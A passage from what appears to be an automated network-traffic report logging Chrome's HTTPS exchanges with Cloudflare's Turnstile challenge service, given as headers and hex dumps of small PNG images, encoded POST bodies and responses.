                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:55 UTC200INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:55 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d1044583219b6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 1a 08 02 00 00 00 9c 8b 53 f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR7SIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.449790104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:56 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8f1d10088a7d4314/1734167450211/C0KkzdsRP1tlIpN HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:57 UTC200INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:57 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d104eaf60f795-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 1a 08 02 00 00 00 9c 8b 53 f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR7SIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449791104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:57 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 31779
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:57 UTC16384OUTData Raw: 76 5f 38 66 31 64 31 30 30 38 38 61 37 64 34 33 31 34 3d 5a 39 41 4f 38 50 51 33 57 50 57 53 39 4a 33 74 36 30 69 4a 48 4a 6e 4f 6d 47 51 57 69 53 51 4e 4a 52 4f 56 33 51 6f 53 69 4a 74 47 52 54 51 52 4a 46 61 4a 51 57 47 4a 4c 35 4a 64 47 4a 67 30 57 47 4a 35 72 50 4d 33 7a 30 56 72 51 51 4a 48 41 51 49 4a 54 49 71 36 39 4f 63 74 51 46 46 6d 47 42 32 36 4a 54 72 4a 73 4a 79 76 32 37 4a 2d 37 41 4a 37 46 7a 4a 42 53 79 4b 4f 50 32 4a 63 4f 4a 74 57 57 5a 4e 4a 42 77 41 4a 42 66 50 4a 48 72 51 68 79 72 4a 63 33 7a 53 4a 4f 48 52 4e 63 67 53 4a 54 68 50 41 6b 79 30 65 74 7a 53 4f 6e 6d 64 76 48 56 76 4e 6f 7a 71 44 46 56 54 54 4a 54 53 4f 39 7a 76 50 4a 42 5a 6b 34 69 52 32 43 67 68 25 32 62 72 57 51 5a 54 62 63 61 7a 55 6b 24 61 55 6c 2b 39 36 42 30 55 57
                                                            Data Ascii: v_8f1d10088a7d4314=Z9AO8PQ3WPWS9J3t60iJHJnOmGQWiSQNJROV3QoSiJtGRTQRJFaJQWGJL5JdGJg0WGJ5rPM3z0VrQQJHAQIJTIq69OctQFFmGB26JTrJsJyv27J-7AJ7FzJBSyKOP2JcOJtWWZNJBwAJBfPJHrQhyrJc3zSJOHRNcgSJThPAky0etzSOnmdvHVvNozqDFVTTJTSO9zvPJBZk4iR2Cgh%2brWQZTbcazUk$aUl+96B0UW
                                                            2024-12-14 09:10:57 UTC15395OUTData Raw: 49 6c 51 58 53 41 52 4c 45 31 4b 47 4a 64 57 6f 4a 41 4f 69 47 4a 50 4a 71 4f 33 4a 79 4f 4a 6f 4f 4d 72 79 4f 4a 41 4a 52 4a 4c 2b 4e 6b 4f 43 41 53 72 51 32 4a 31 4a 63 72 51 6d 4a 47 4f 54 74 61 2d 4a 33 4f 41 57 4a 50 4a 6b 4f 51 57 42 77 4a 43 4f 50 74 42 4d 4a 7a 4f 79 4f 69 72 6d 66 32 63 47 38 59 4f 57 4a 5a 6a 50 57 4a 53 50 6d 74 4a 50 4a 77 53 69 65 63 39 47 4e 45 6a 47 54 50 4a 66 72 42 6a 51 47 4a 63 4f 56 24 4a 53 51 37 4a 2d 4a 42 54 51 41 4a 56 41 58 79 53 6b 44 67 57 42 58 65 74 4a 41 74 51 2b 51 45 4a 44 72 56 57 4a 34 4f 48 47 50 6c 53 4a 4f 5a 33 30 44 57 6e 6e 6d 4f 51 41 36 58 65 69 61 58 50 4b 74 38 6b 4b 4f 39 36 52 4c 55 68 49 36 4b 65 66 78 68 49 2b 4b 4f 62 6b 68 24 62 57 74 62 67 2d 35 75 41 6a 62 43 63 49 39 4a 6d 4f 5a 63 39
                                                            Data Ascii: IlQXSARLE1KGJdWoJAOiGJPJqO3JyOJoOMryOJAJRJL+NkOCASrQ2J1JcrQmJGOTta-J3OAWJPJkOQWBwJCOPtBMJzOyOirmf2cG8YOWJZjPWJSPmtJPJwSiec9GNEjGTPJfrBjQGJcOV$JSQ7J-JBTQAJVAXySkDgWBXetJAtQ+QEJDrVWJ4OHGPlSJOZ30DWnnmOQA6XeiaXPKt8kKO96RLUhI6KefxhI+KObkh$bWtbg-5uAjbCcI9JmOZc9
                                                            2024-12-14 09:10:57 UTC330INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:57 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 26336
                                                            Connection: close
                                                            cf-chl-gen: nK22iwOM89IB/0kz9i9WfYLHB4GcT4MfOC3H+sGckcUsRE6LHiombcR7PGBQlhot3nwzPbcVf4iz20ll$ZQ5GFlXFyziYjY9S
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d1050efec5e67-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:57 UTC1039INData Raw: 6d 33 61 67 69 71 32 79 65 35 53 50 6a 37 36 57 6d 61 6e 47 78 70 75 77 75 73 43 4f 76 38 4c 45 6b 73 50 52 31 61 72 49 71 39 32 65 31 63 76 42 6f 63 48 4e 35 4c 44 57 73 4d 69 33 74 4b 53 72 7a 64 76 4e 35 37 2f 6a 77 4e 4b 2f 39 72 66 59 79 73 50 64 74 37 6d 34 7a 2b 4c 5a 7a 2f 37 43 32 4c 30 43 33 4e 62 6d 36 73 33 72 78 67 7a 79 36 4e 7a 75 43 38 77 4c 35 2b 6e 79 35 76 6a 61 37 39 38 62 49 2b 73 45 47 77 66 31 46 41 6a 62 34 42 77 44 44 53 45 45 2f 4f 37 74 48 6a 49 65 4d 7a 49 6d 42 54 76 36 48 43 66 33 4d 44 34 31 49 43 2f 38 4d 43 4d 53 52 77 59 4c 50 55 41 58 44 51 49 4d 44 55 39 45 4c 52 51 78 49 30 39 54 56 7a 45 56 4f 44 41 5a 53 6a 73 39 58 52 35 6d 59 6c 49 7a 49 47 56 6d 5a 53 64 71 4c 6a 35 62 62 6d 34 75 4c 32 35 77 62 6b 35 58 4e 56 68
                                                            Data Ascii: m3agiq2ye5SPj76WmanGxpuwusCOv8LEksPR1arIq92e1cvBocHN5LDWsMi3tKSrzdvN57/jwNK/9rfYysPdt7m4z+LZz/7C2L0C3Nbm6s3rxgzy6NzuC8wL5+ny5vja798bI+sEGwf1FAjb4BwDDSEE/O7tHjIeMzImBTv6HCf3MD41IC/8MCMSRwYLPUAXDQIMDU9ELRQxI09TVzEVODAZSjs9XR5mYlIzIGVmZSdqLj5bbm4uL25wbk5XNVh
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 73 7a 59 6d 4d 6e 38 4b 69 70 61 62 44 6b 73 57 6e 6a 35 4b 73 70 4d 32 74 30 70 76 4b 7a 2b 44 43 73 4e 32 65 77 37 6d 67 31 37 33 6e 34 73 37 70 30 63 71 70 38 39 54 4f 73 4f 6e 70 37 37 48 74 37 4e 2b 32 32 39 63 45 2f 4f 48 6b 30 4f 41 47 38 39 4d 4e 36 73 54 38 7a 64 30 53 32 2b 37 65 38 78 4c 77 35 77 2f 56 38 77 58 78 38 41 38 41 2b 78 58 77 39 75 37 6d 34 77 6e 6b 4b 76 6b 6e 44 50 6f 63 48 76 77 47 44 67 58 75 42 51 50 30 41 78 41 63 39 78 49 56 4c 78 6b 65 49 44 30 67 49 79 67 44 50 78 38 61 43 41 6f 4f 53 41 6f 5a 51 79 42 4c 48 7a 56 4e 45 30 55 4d 46 78 4e 56 57 69 31 42 55 79 31 54 56 6b 56 5a 4e 6c 34 35 52 31 34 65 48 30 39 62 51 57 4e 71 53 57 73 79 53 30 5a 77 4d 56 4a 4a 4f 31 64 56 56 32 78 61 67 31 42 74 64 46 42 6d 66 6c 5a 61 69 31
                                                            Data Ascii: szYmMn8KipabDksWnj5KspM2t0pvKz+DCsN2ew7mg173n4s7p0cqp89TOsOnp77Ht7N+229cE/OHk0OAG89MN6sT8zd0S2+7e8xLw5w/V8wXx8A8A+xXw9u7m4wnkKvknDPocHvwGDgXuBQP0AxAc9xIVLxkeID0gIygDPx8aCAoOSAoZQyBLHzVNE0UMFxNVWi1BUy1TVkVZNl45R14eH09bQWNqSWsyS0ZwMVJJO1dVV2xag1BtdFBmflZai1
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 77 37 48 45 7a 4c 2f 42 79 4e 43 79 31 4d 62 4b 32 64 32 75 32 4b 4f 31 31 75 61 35 35 5a 76 4b 79 75 4c 4e 77 38 6a 46 30 73 66 65 34 2b 2f 65 37 2b 72 77 35 4d 62 50 38 2b 37 78 36 74 4c 32 30 4d 50 34 33 76 7a 59 42 73 6e 36 78 63 73 4a 7a 39 38 54 41 65 7a 75 38 39 55 4f 38 4f 4d 4e 36 52 76 36 39 66 48 6f 44 2b 45 6a 38 69 45 66 4b 66 41 54 36 51 59 73 41 79 49 45 48 51 55 62 48 77 77 52 42 42 67 50 41 68 51 57 45 79 63 7a 4e 52 73 68 4c 42 49 2f 50 77 51 35 49 45 4e 41 51 45 46 4f 42 7a 34 4e 52 69 55 6f 53 51 30 58 44 6b 64 61 52 79 74 4a 57 31 6f 53 4d 54 49 61 49 6b 4e 68 50 57 4e 58 49 7a 56 6a 4e 6b 5a 4a 53 54 6f 6b 4d 47 56 4b 55 30 56 57 65 56 74 76 55 53 39 39 4e 6e 70 59 67 46 35 7a 67 31 49 2b 63 58 39 47 52 49 4f 42 68 32 65 48 66 59 74
                                                            Data Ascii: w7HEzL/ByNCy1MbK2d2u2KO11ua55ZvKyuLNw8jF0sfe4+/e7+rw5MbP8+7x6tL20MP43vzYBsn6xcsJz98TAezu89UO8OMN6Rv69fHoD+Ej8iEfKfAT6QYsAyIEHQUbHwwRBBgPAhQWEyczNRshLBI/PwQ5IENAQEFOBz4NRiUoSQ0XDkdaRytJW1oSMTIaIkNhPWNXIzVjNkZJSTokMGVKU0VWeVtvUS99NnpYgF5zg1I+cX9GRIOBh2eHfYt
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 4b 75 36 6a 73 6a 63 31 4c 4b 31 34 73 44 68 7a 61 61 65 78 72 57 68 79 63 66 64 37 36 66 72 32 36 76 50 71 38 65 79 72 38 2f 56 74 64 6a 61 2f 4e 66 49 74 2f 7a 73 37 2f 6d 2f 38 38 41 45 43 38 6a 6a 36 51 58 65 7a 75 44 38 34 63 73 56 41 73 38 58 30 2b 6a 33 2b 68 4c 39 48 66 66 39 36 68 4c 61 46 50 4d 57 47 76 54 32 46 4f 50 2b 42 69 72 76 44 53 45 79 2f 41 4d 4b 4f 43 37 71 38 7a 63 34 4b 67 6f 70 4c 7a 77 38 52 43 34 6b 4f 41 38 2b 4e 51 6b 33 49 30 5a 49 4f 79 70 46 53 30 59 77 44 68 49 77 4e 69 51 32 4e 55 34 75 4d 6c 4d 70 49 54 34 39 52 47 46 66 50 46 38 79 50 6a 70 64 58 6c 31 59 53 57 68 4a 63 54 52 65 55 57 51 7a 65 45 64 37 57 33 35 70 61 58 52 69 63 30 42 74 59 44 78 45 56 6c 70 45 52 58 64 47 59 6e 65 42 61 56 70 4b 67 49 52 79 54 34 56 79
                                                            Data Ascii: Ku6jsjc1LK14sDhzaaexrWhycfd76fr26vPq8eyr8/Vtdja/NfIt/zs7/m/88AEC8jj6QXezuD84csVAs8X0+j3+hL9Hff96hLaFPMWGvT2FOP+BirvDSEy/AMKOC7q8zc4KgopLzw8RC4kOA8+NQk3I0ZIOypFS0YwDhIwNiQ2NU4uMlMpIT49RGFfPF8yPjpdXl1YSWhJcTReUWQzeEd7W35paXRic0BtYDxEVlpERXdGYneBaVpKgIRyT4Vy
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 48 62 75 4c 48 67 34 4e 33 51 73 4c 7a 49 34 75 72 4c 36 2b 36 72 76 71 6a 45 39 64 37 6d 78 72 65 78 37 2b 7a 38 38 4c 6e 52 34 66 44 69 42 4f 58 31 2f 4f 2f 64 2b 64 72 64 76 74 2f 68 35 68 48 44 34 66 4c 77 39 42 44 6c 46 78 62 6b 37 76 6b 48 32 67 41 58 2b 2f 4d 55 2b 65 41 6c 45 65 63 49 4a 67 7a 6f 43 2f 37 6f 45 65 33 75 37 67 4d 45 38 51 49 5a 4c 7a 51 56 42 66 66 38 4e 6b 41 58 50 66 77 33 50 69 67 53 46 68 4d 63 49 68 34 36 4c 69 59 74 52 43 51 74 56 44 38 53 46 54 6c 51 4f 69 6b 63 55 6a 41 32 53 6b 38 31 4d 52 39 62 57 31 39 71 58 30 6c 6e 4b 47 4d 2b 4c 55 4e 6b 55 31 78 51 59 55 59 30 4d 6d 5a 5a 63 46 46 71 54 32 68 54 64 32 52 5a 51 48 6c 39 55 6c 64 36 61 34 52 75 64 34 4f 45 58 33 39 6a 54 58 61 49 61 47 70 6f 68 6c 61 51 62 34 68 76 6a
                                                            Data Ascii: HbuLHg4N3QsLzI4urL6+6rvqjE9d7mxrex7+z88LnR4fDiBOX1/O/d+drdvt/h5hHD4fLw9BDlFxbk7vkH2gAX+/MU+eAlEecIJgzoC/7oEe3u7gME8QIZLzQVBff8NkAXPfw3PigSFhMcIh46LiYtRCQtVD8SFTlQOikcUjA2Sk81MR9bW19qX0lnKGM+LUNkU1xQYUY0MmZZcFFqT2hTd2RZQHl9Uld6a4Rud4OEX39jTXaIaGpohlaQb4hvj
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 50 74 4f 4c 6b 70 63 4f 6d 77 38 62 59 34 37 4c 77 79 36 7a 78 30 61 71 79 35 73 62 54 2b 76 6e 53 36 37 76 54 2b 4e 58 35 31 76 50 70 2b 39 71 39 33 76 7a 34 42 50 6b 47 7a 63 58 74 42 2f 59 4d 34 78 72 36 37 75 38 52 46 66 6b 64 49 77 33 5a 42 64 7a 6d 49 41 54 69 36 65 45 48 35 51 4c 74 45 75 77 48 35 65 62 73 4d 76 45 6a 4c 68 77 47 44 53 2f 39 48 78 49 77 2f 52 6f 59 4f 41 4d 53 47 54 34 62 4f 43 35 4f 43 7a 67 64 53 30 30 4f 4c 41 38 73 4c 30 46 4d 47 31 6b 30 46 56 6f 36 45 78 74 50 4c 7a 78 6a 59 6a 74 55 4a 44 78 67 52 46 38 71 4b 55 78 6a 61 53 70 43 64 6c 64 4f 52 47 78 4c 4c 6c 68 76 64 54 4a 68 64 57 32 41 59 33 56 5a 52 6c 36 4c 53 33 31 6f 52 34 5a 6e 65 70 4e 54 5a 33 47 54 6b 6f 32 48 6d 31 6c 61 64 31 69 4b 6f 49 4b 69 67 33 70 77 6c 6d
                                                            Data Ascii: PtOLkpcOmw8bY47Lwy6zx0aqy5sbT+vnS67vT+NX51vPp+9q93vz4BPkGzcXtB/YM4xr67u8RFfkdIw3ZBdzmIATi6eEH5QLtEuwH5ebsMvEjLhwGDS/9HxIw/RoYOAMSGT4bOC5OCzgdS00OLA8sL0FMG1k0FVo6ExtPLzxjYjtUJDxgRF8qKUxjaSpCdldORGxLLlhvdTJhdW2AY3VZRl6LS31oR4ZnepNTZ3GTko2Hm1lad1iKoIKig3pwlm
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 35 4f 66 48 35 4e 4f 39 79 75 58 47 38 39 44 70 32 71 33 54 37 63 2f 4a 33 66 50 53 41 4e 54 32 31 39 48 5a 2b 67 45 45 35 51 44 76 37 65 67 43 34 67 6a 6e 42 74 45 55 38 41 7a 36 48 50 51 52 2f 74 48 34 45 68 6b 63 2f 52 66 68 4a 50 34 62 2b 2f 6b 4b 48 2b 6e 6f 42 53 4c 74 4a 41 6b 6d 38 67 59 50 4b 6a 49 61 46 43 34 31 2f 42 6f 7a 49 7a 67 5a 4e 68 66 35 49 54 30 72 2f 52 34 2f 43 78 34 6e 52 44 4d 47 4b 6b 67 6f 49 6a 5a 4c 55 51 34 78 54 69 39 59 4e 31 52 44 57 44 35 59 53 45 59 2f 57 32 45 6c 51 56 35 6c 62 45 5a 69 61 57 78 4e 61 56 63 31 54 57 78 4c 65 46 5a 75 4f 6f 42 53 64 46 4e 38 59 6e 64 39 68 47 4a 38 61 30 6c 68 66 30 71 45 61 6f 4e 30 63 6d 71 49 64 34 68 75 69 32 75 55 64 59 35 77 62 6e 47 56 67 31 5a 33 6c 33 64 68 67 4a 75 68 61 59 4b
                                                            Data Ascii: 5OfH5NO9yuXG89Dp2q3T7c/J3fPSANT219HZ+gEE5QDv7egC4gjnBtEU8Az6HPQR/tH4Ehkc/RfhJP4b+/kKH+noBSLtJAkm8gYPKjIaFC41/BozIzgZNhf5IT0r/R4/Cx4nRDMGKkgoIjZLUQ4xTi9YN1RDWD5YSEY/W2ElQV5lbEZiaWxNaVc1TWxLeFZuOoBSdFN8Ynd9hGJ8a0lhf0qEaoN0cmqId4hui2uUdY5wbnGVg1Z3l3dhgJuhaYK
                                                            2024-12-14 09:10:57 UTC1369INData Raw: 65 75 31 7a 62 48 74 75 4e 58 63 38 4f 65 78 39 50 32 2f 33 65 54 34 37 38 44 38 42 73 66 6c 37 41 48 33 35 64 77 4f 43 76 45 57 42 65 72 55 2b 52 54 57 2b 66 4d 53 38 50 62 32 46 67 7a 35 41 68 6a 32 35 41 6b 67 36 65 67 4f 4b 4f 6f 4f 43 43 50 75 4a 42 49 77 46 78 4d 51 4c 69 51 53 47 6a 6f 51 50 50 77 34 2f 6a 67 43 4f 67 55 34 4f 6b 59 73 53 41 70 43 49 45 41 75 54 41 34 75 44 45 6c 41 4d 69 56 56 50 44 6f 56 54 54 4a 49 50 6c 31 5a 50 7a 78 61 55 46 52 47 5a 47 4a 63 53 6d 6b 71 53 69 78 6c 58 47 52 42 63 6c 68 57 4e 57 6c 4f 64 46 70 36 64 56 74 59 64 6d 78 57 59 6f 42 6f 65 56 57 48 67 33 52 6d 68 56 39 72 61 49 5a 38 6a 48 4b 54 6a 34 42 79 6b 57 79 4d 65 70 75 58 69 48 6d 5a 63 33 39 38 6d 70 43 63 68 71 65 6a 6c 49 57 6c 67 4b 43 4f 72 36 75 63
                                                            Data Ascii: eu1zbHtuNXc8Oex9P2/3eT478D8Bsfl7AH35dwOCvEWBerU+RTW+fMS8Pb2Fgz5Ahj25Akg6egOKOoOCCPuJBIwFxMQLiQSGjoQPPw4/jgCOgU4OkYsSApCIEAuTA4uDElAMiVVPDoVTTJIPl1ZPzxaUFRGZGJcSmkqSixlXGRBclhWNWlOdFp6dVtYdmxWYoBoeVWHg3RmhV9raIZ8jHKTj4BykWyMepuXiHmZc398mpCchqejlIWlgKCOr6uc


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.449797104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:59 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:59 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Sat, 14 Dec 2024 09:10:59 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: LXePFKethmg+cCIsSvDHTC4I0LMHMJyctS0=$1dSjiS5ymF4+9mj1
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d105eab295e7d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.449814104.18.94.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:11:05 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1218287069:1734164783:svNwVqlgGe--o7-M-DZ4hvYyFzq8ZgbcuaxVIprV47s/8f1d10088a7d4314/BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 34115
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: BgLWU.RyBKmoxAAo9UjEgZrJJPJ8WnAiRvGW6ZVmn5U-1734167445-1.1.1.1-xlmFZgyc1vBpqI9B1_2eksGkkfrFeMt674EUYQ7lhjY3RoptqAPQFQ5zfBWdbm3V
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ncbj0/0x4AAAAAAA0Iaj6F5in3jjND/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:11:05 UTC16384OUTData Raw: 76 5f 38 66 31 64 31 30 30 38 38 61 37 64 34 33 31 34 3d 5a 39 41 4f 38 50 51 33 57 50 57 53 39 4a 33 74 36 30 69 4a 48 4a 6e 4f 6d 47 51 57 69 53 51 4e 4a 52 4f 56 33 51 6f 53 69 4a 74 47 52 54 51 52 4a 46 61 4a 51 57 47 4a 4c 35 4a 64 47 4a 67 30 57 47 4a 35 72 50 4d 33 7a 30 56 72 51 51 4a 48 41 51 49 4a 54 49 71 36 39 4f 63 74 51 46 46 6d 47 42 32 36 4a 54 72 4a 73 4a 79 76 32 37 4a 2d 37 41 4a 37 46 7a 4a 42 53 79 4b 4f 50 32 4a 63 4f 4a 74 57 57 5a 4e 4a 42 77 41 4a 42 66 50 4a 48 72 51 68 79 72 4a 63 33 7a 53 4a 4f 48 52 4e 63 67 53 4a 54 68 50 41 6b 79 30 65 74 7a 53 4f 6e 6d 64 76 48 56 76 4e 6f 7a 71 44 46 56 54 54 4a 54 53 4f 39 7a 76 50 4a 42 5a 6b 34 69 52 32 43 67 68 25 32 62 72 57 51 5a 54 62 63 61 7a 55 6b 24 61 55 6c 2b 39 36 42 30 55 57
                                                            Data Ascii: v_8f1d10088a7d4314=Z9AO8PQ3WPWS9J3t60iJHJnOmGQWiSQNJROV3QoSiJtGRTQRJFaJQWGJL5JdGJg0WGJ5rPM3z0VrQQJHAQIJTIq69OctQFFmGB26JTrJsJyv27J-7AJ7FzJBSyKOP2JcOJtWWZNJBwAJBfPJHrQhyrJc3zSJOHRNcgSJThPAky0etzSOnmdvHVvNozqDFVTTJTSO9zvPJBZk4iR2Cgh%2brWQZTbcazUk$aUl+96B0UW
                                                            2024-12-14 09:11:05 UTC16384OUTData Raw: 49 6c 51 58 53 41 52 4c 45 31 4b 47 4a 64 57 6f 4a 41 4f 69 47 4a 50 4a 71 4f 33 4a 79 4f 4a 6f 4f 4d 72 79 4f 4a 41 4a 52 4a 4c 2b 4e 6b 4f 43 41 53 72 51 32 4a 31 4a 63 72 51 6d 4a 47 4f 54 74 61 2d 4a 33 4f 41 57 4a 50 4a 6b 4f 51 57 42 77 4a 43 4f 50 74 42 4d 4a 7a 4f 79 4f 69 72 6d 66 32 63 47 38 59 4f 57 4a 5a 6a 50 57 4a 53 50 6d 74 4a 50 4a 77 53 69 65 63 39 47 4e 45 6a 47 54 50 4a 66 72 42 6a 51 47 4a 63 4f 56 24 4a 53 51 37 4a 2d 4a 42 54 51 41 4a 56 41 58 79 53 6b 44 67 57 42 58 65 74 4a 41 74 51 2b 51 45 4a 44 72 56 57 4a 34 4f 48 47 50 6c 53 4a 4f 5a 33 30 44 57 6e 6e 6d 4f 51 41 36 58 65 69 61 58 50 4b 74 38 6b 4b 4f 39 36 52 4c 55 68 49 36 4b 65 66 78 68 49 2b 4b 4f 62 6b 68 24 62 57 74 62 67 2d 35 75 41 6a 62 43 63 49 39 4a 6d 4f 5a 63 39
                                                            Data Ascii: IlQXSARLE1KGJdWoJAOiGJPJqO3JyOJoOMryOJAJRJL+NkOCASrQ2J1JcrQmJGOTta-J3OAWJPJkOQWBwJCOPtBMJzOyOirmf2cG8YOWJZjPWJSPmtJPJwSiec9GNEjGTPJfrBjQGJcOV$JSQ7J-JBTQAJVAXySkDgWBXetJAtQ+QEJDrVWJ4OHGPlSJOZ30DWnnmOQA6XeiaXPKt8kKO96RLUhI6KefxhI+KObkh$bWtbg-5uAjbCcI9JmOZc9
